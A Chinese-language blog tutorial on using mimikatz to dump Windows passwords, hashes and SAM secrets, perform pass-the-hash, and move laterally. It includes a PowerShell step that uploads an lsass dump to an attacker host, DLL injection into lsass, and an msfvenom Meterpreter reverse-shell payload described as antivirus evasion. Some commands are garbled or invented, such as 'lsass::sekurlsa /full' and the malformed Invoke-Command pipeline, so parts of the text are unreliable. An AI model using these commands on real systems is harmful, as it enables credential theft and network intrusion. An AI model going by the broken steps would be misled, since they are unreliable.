Mimikatz 使用教程

mimikatz 是一款用於 Windows 系統的免費開源密碼查看工具,它支持從散列密碼到明文密碼的轉換操作,同時還可抓取 Windows 口令、PIN 和憑證等。本篇文章將從多個角度介紹 mimikatz 的使用方法,包括基本用法、橫向滲透、提升權限、DLL 劫持以及 AV 防護繞過等內容。

一、基本用法

mimikatz 的基本操作主要包括三個命令,分別是 sekurlsa、lsadump 和 token。其中 sekurlsa 可以用於抓取當前系統登錄者的各種密碼,如明文密碼、NTLM hash、Kerberos TGT 等;lsadump 可以從本地 SAM 數據庫和遠程 SAM 數據庫等中提取 Windows 的密碼、憑證等信息;token 命令可用於模擬權限,將 mimikatz 的進程權限提升至系統級別,從而繞過一些限制,例如 VBS 腳本等。

1、使用 sekurlsa 命令抓取 Windows 登錄者密碼:

privilege::debug
sekurlsa::logonpasswords

2、使用 lsadump 命令提取 SAM 數據庫中的密碼:

lsadump::sam
lsadump::secrets
lsadump::cache

3、使用 token 命令提升權限:

token::elevate
token::whoami

二、橫向滲透

在攻擊中,mimikatz 還可以用於進行橫向滲透,進而獲取更多機器的權限。通過遠程執行 mimikatz 命令,我們可以利用被攻擊機器已經獲得的權限,嘗試獲取其他機器的口令和憑證。以下是基本使用方法:

1、在被攻擊機器上執行以下命令:

sekurlsa::pth /user:Administrator /domain:test.com /ntlm:f1cedbd432e8d3ea0c1c64a1ac4a9d1c /run:powershell.exe

其中,/user 參數指定管理員賬戶名稱,/domain 指定域名,/ntlm 是 hash 值,/run 參數指定要運行的程序。執行該命令後,會返回一個新的控制台。

2、在新控制台中,執行以下命令:

$password = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force
$cred = new-object System.Management.Automation.PSCredential("test\user", $password)
Invoke-Command -ComputerName <IP> -Credential $cred -ScriptBlock { lsass::sekurlsa /full } | .\mimikatz.exe "sekurlsa::minidump lsass.dmp"
Invoke-WebRequest -URI 'http://<Attacker_IP>/lsass.dmp' -Method PUT -InFile lsass.dmp

其中,$password 表示指定的密碼,$cred 是強制指定的憑證對象,-ComputerName 是遠程機器的 IP 地址,lsass::sekurlsa /full 是執行的命令,Invoke-WebRequest 是訪問遠程地址的命令。執行該命令後,會將 lsass.dmp 文件上傳到攻擊機器上。

3、使用 mimikatz 分析 lsass.dmp 文件。攻擊者在自己的機器上執行以下命令:

sekurlsa::minidump /in:"<path_to>\lsass.dmp"
sekurlsa::logonpasswords

該命令會打印出 lsass 進程中存儲的所有憑證和口令。

三、提升權限

mimikatz 還可以通過提升權限來繞過賬戶限制,獲取更高的權限,從而執行敏感操作。常見的方法有 DLL 劫持和管道提權。

1、DLL 劫持攻擊。攻擊者需要尋找 DLL 容器、DLL 記錄表等方式,執行以下命令:

privilege::debug
inject::process /name:lsass.exe /path:C:\temp\mydll.dll

其中,/name 指定進程名,/path 指定要注入的 DLL 文件路徑。執行該命令後,攻擊者會成功注入 mydll.dll 文件。

2、管道提權。攻擊者可以通過提高自己或其他用戶的權限,獲取系統級別的權限。執行以下命令:

privilege::debug
lsadump::lsa /inject /name:<user_name> /password:<password>

其中,/inject 參數表示注入,/name 是賬戶名稱,/password 是密碼。執行該命令後,攻擊者可以成功獲取更高的權限。

四、AV 防護繞過

在攻擊中,mimikatz 還可以用於繞過防護軟件的檢測,例如使用 Meterpreter 的反彈 shell。攻擊者可以通過以下方式執行:

1、將 Meterpreter payload 複製到本地機器上:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o meterpreter.exe

2、使用 mimikatz 注入 Meterpreter 流量,執行以下命令:

privilege::debug
inject::process /name:explorer.exe /path:D:\meterpreter.exe

其中,/name 指定進程名,/path 指定要注入的 DLL 文件路徑。執行該命令後,攻擊者會成功注入 Meterpreter 流量,並攔截密碼。

總結

mimikatz 是一款功能強大的密碼查看工具,在 Windows 滲透和後滲透過程中起到了很好的作用。在使用過程中,需要特別注意安全防範,避免工具淪為犯罪工具,造成不必要的麻煩。

原創文章,作者:HLGXS,如若轉載,請註明出處:https://www.506064.com/zh-hk/n/333964.html

(0)
打賞 微信掃一掃 微信掃一掃 支付寶掃一掃 支付寶掃一掃
HLGXS的頭像HLGXS
上一篇 2025-02-05 13:04
下一篇 2025-02-05 13:05

相關推薦

  • MQTT使用教程

    MQTT是一種輕量級的消息傳輸協議,適用於物聯網領域中的設備與雲端、設備與設備之間的數據傳輸。本文將介紹使用MQTT實現設備與雲端數據傳輸的方法和注意事項。 一、準備工作 在使用M…

    編程 2025-04-29
  • Python3.6.5下載安裝教程

    Python是一種面向對象、解釋型計算機程序語言。它是一門動態語言,因為它不會對程序員提前聲明變量類型,而是在變量第一次賦值時自動識別該變量的類型。 Python3.6.5是Pyt…

    編程 2025-04-29
  • Deepin系統分區設置教程

    本教程將會詳細介紹Deepin系統如何進行分區設置,分享多種方式讓您了解如何規劃您的硬盤。 一、分區的基本知識 在進行Deepin系統分區設置之前,我們需要了解一些基本分區概念。 …

    編程 2025-04-29
  • 寫代碼新手教程

    本文將從語言選擇、學習方法、編碼規範以及常見問題解答等多個方面,為編程新手提供實用、簡明的教程。 一、語言選擇 作為編程新手,選擇一門編程語言是很關鍵的一步。以下是幾個有代表性的編…

    編程 2025-04-29
  • Qt雷達探測教程

    本文主要介紹如何使用Qt開發雷達探測程序,並展示一個簡單的雷達探測示例。 一、環境準備 在開始本教程之前,需要確保你的開發環境已經安裝Qt和Qt Creator。如果沒有安裝,可以…

    編程 2025-04-29
  • 猿編程python免費全套教程400集

    想要學習Python編程嗎?猿編程python免費全套教程400集是一個不錯的選擇!下面我們來詳細了解一下這個教程。 一、課程內容 猿編程python免費全套教程400集包含了從P…

    編程 2025-04-29
  • Python煙花教程

    Python煙花代碼在近年來越來越受到人們的歡迎,因為它可以讓我們在終端里玩煙花,不僅具有視覺美感,還可以通過代碼實現動畫和音效。本教程將詳細介紹Python煙花代碼的實現原理和模…

    編程 2025-04-29
  • 使用Snare服務收集日誌:完整教程

    本教程將介紹如何使用Snare服務收集Windows服務器上的日誌,並將其發送到遠程服務器進行集中管理。 一、安裝和配置Snare 1、下載Snare安裝程序並安裝。 https:…

    編程 2025-04-29
  • Python畫K線教程

    本教程將從以下幾個方面詳細介紹Python畫K線的方法及技巧,包括數據處理、圖表繪製、基本設置等等。 一、數據處理 1、獲取數據 在Python中可以使用Pandas庫獲取K線數據…

    編程 2025-04-28
  • Python語言程序設計教程PDF趙璐百度網盤介紹

    Python語言程序設計教程PDF趙璐百度網盤是一本介紹Python語言編程的入門教材,本文將從以下幾個方面對其進行詳細闡述。 一、Python語言的特點 Python語言屬於解釋…

    編程 2025-04-28

發表回復

登錄後才能評論